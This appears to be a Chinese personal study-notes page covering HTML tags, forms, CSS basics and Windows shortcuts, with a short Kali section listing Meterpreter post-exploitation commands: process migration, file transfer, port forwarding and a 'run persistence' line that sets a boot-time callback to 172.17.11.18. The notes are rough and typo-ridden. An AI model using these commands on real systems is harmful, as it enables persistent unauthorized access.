按钮弹出文字

1
2
3
4
5
6
<script type="text/javascript">
function a(){
alert("有啥好看的");
}
</script>
<input type="button" value=按钮弹出文字 onClick="javascript:a()">


​ 表格
​ 加粗
<strong>
​ 倾斜
<em><i>
​ 删除线
<del><s>
​ 下划线
<ins><u>
​ 盒子
<div 占一行><span 跨距>
​ 图像
<img src="" alt="" title=" height="" width="" border="边框属性">
​ 超链接
targrt="_blank""_self" ​ <href=""><img src=""> ​ <a href="#two">属性介绍
​ 标签属性
<id ="two"> 属性介绍
​ 注释标签
<!-- -->
​ 字符
​ 空格符
&nbsp; ​ < ​ &lt; ​ > ​ &gt; ​ & ​ &amp; ​ ¥ ​ &yen; ​ © ​ &copy; ​ ® ​ &reg; ​ ° ​ &deg; ​ -+ ​ &plusmn; ​ * ​ &times; ​
​ 表格标签
​ ​ 展示/显示 数据 ​ <table> 定义表格的标签 ​ <thead> ​ <tr> 定义表格行 ​ <th>……</th>html表头部分 ​ </tr> ​ <thead> ​ <tbody> ​ <tr> 定义表格行 ​ <td>……</td> 定义单元格/内容 加粗 ​ <td>……</td> 定义单元格/内容 ​ </tr> ​ </tobdy> ​ </table> ​
​ left ​ center ​ right ​ border 边框 ​ 1 ​ "" 默认没有边框 ​ 像素值 ​ cellpadding 默认1像素 <-> ​ cellspacing 默认2像素 >-< ​ width 宽度 ​ height 高度 ​ 合并单元格 ​ rowspan 跨行合并 数量 最上侧 ​ colspan 跨列合并 数量 最左侧
列表标签《布局》
​ 有序
​ <ol> ​ <li> ​ </li> ​ <li> ​ </li> ​ </ol> ​
​ 无序
​ <ul> ​ <li> ​ </li> ​ <li> ​ <p> ​ </p> ​ </li> ​ </ul> ​

​ 自定义列表
​ <dl> ​ <dt> 项目 ​ </dt> ​ <dd> 描述 ​ </dd> ​ <dd> ​ </dd> 表单标签《收集信息》 ​ 表单域 ​ <form ​ action="demo.php" url ​ method="post" 提交方式 ​ name="表单域名称"> ​ <> ​ 表单控件 ​ <input type="属性值" /> ​ 提示信息 ​ <></> ​ </form> ​
表单元素
<input type=" ​ button 定义点击按钮 ​ checkbox 定义复选框 ​ file 定义文件 ​ hidden 定义隐藏的输入字段 ​ image 定义图像形式提交按钮 ​ password 定义密码字段 ​ radio 定义单选按钮 <name> ​ reset 定义从之按钮 ​ submit 定义提交按钮 ​ text 定义单行的输入字段,默认20字符 ​ "> ​
​ 表单元素属性
name 定义 input元素的名称 ​ value 规定 input元素的值 提示信息 ​ checked ​ checked="checked" 规定此input元素首次加载被选中 ​ maxlength 最大长度 ​
​ <label> input元素定义标注(标签)绑定表单元素 增加选择空间大小 ​ <input type="radio" name="sex" id="nan"/><label for="nan">男</label> ​ <input type="radio" name="sex" id="nv"/><label for="nv">女</label> ​ <from> ​ 选择: ​ <select> ​ <option selected="selected" value="">1</option>} ​ <option value="">2</option> ​ <option value=""></option> ​ </select> ​ </from> ​
​ 表单控件《表单元素》
​ <form> ​ <textarea name=""cols="每行的字符数" rows="显示的行数">显示内容</textarea> ​ </form> ​


CSS 样式表
​ <style type="text/css" media="screen"> ​ p { ​ color: red; ​ /*修改文字像素大小*/ ​ font-size: 12px; ​ } ​ </style> ​
​ 字体
​ font -weight: 字体粗细 ​ font-size: 字体大小 ​ background-color: 背景颜色 ​ color: 字体颜色 ​ font-style:字体样式 ​
​ 文本
​ text-align:文本对齐engxius ​ text-indent:文本缩进 ​ text-decoration:文本修饰,下划线 ​ line-height:行高 ​
​css内嵌表
ini ​<style></style> 利润可以放任何地方 ​行内样式表<p style{"color:red"}>控制当前样式</p> ​外部样式表<link rel="stylesheet" herf=""> 分割线<input type="text"><button> ​

1
2
3
4
5
6
7
8
9
10
11
12
13
14
    ​选择器
​元素 p span
​类 #id
​属性 img<src>
​伪类选择器 a:hover
​```
```ini
​ <style type="text/css" media="screen">
​ p {
​ color: red;
​ /*修改文字像素大小*/
​ font-size: 12px;
​ }
​ </style>

​ 字体
ini ​ font -weight: 字体粗细 ​ font-size: 字体大小 ​ background-color: 背景颜色 ​ color: 字体颜色 ​ font-style:字体样式 ​
​ 文本
ini ​ text-align:文本对齐engxius ​ text-indent:文本缩进 ​ text-decoration:文本修饰,下划线 ​ line-height:行高 ​
​选择器
​后代选择器 ​伪类选择器 ​子选择器

win快捷键

网络适配器 ncpa.cpl

笔记本 notepad

远程桌面 mstsc

查看登录 query user

发送信息 msg user message

注册表 regedit

Kali

meterpreter
1
2
3
background #挂起
sessions -l
sessions -i number
进程迁移
1
migrate 进程号
getwd 查看工作目录
uoload上传文件到目标主机 == scp 双斜杠转义
download 下载目标主机文件到本地
edit 编辑文件
search search -d 路劲 -f *.name
portfwd 端口转发
1
portfwd add -l 接收端口 -p 转发端口 -r 侦听地址
rdesktop -u user -p pwd ip 远程桌面
route 查看路由表
getuid 查看注入目标主机进程所属用户
sysinfo 系统信息
ps 查看进程信息
migrate 移植进程
execute 运行程序
1
execute -H -f xxx.exe 图形界面隐藏
run persistence -X(开机自启) -l(间隔时间) 5 -p 4444 -r 172.17.11.18

centos

1
2
3
4
yum install httpd mysql mysql-server mysql-libs mysql-server -y
sudo rpm -Uvh http://dev.mysql.com/get/mysql-community-release-el7-5.noarch.rpm
yum clean all
yum makecache

XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way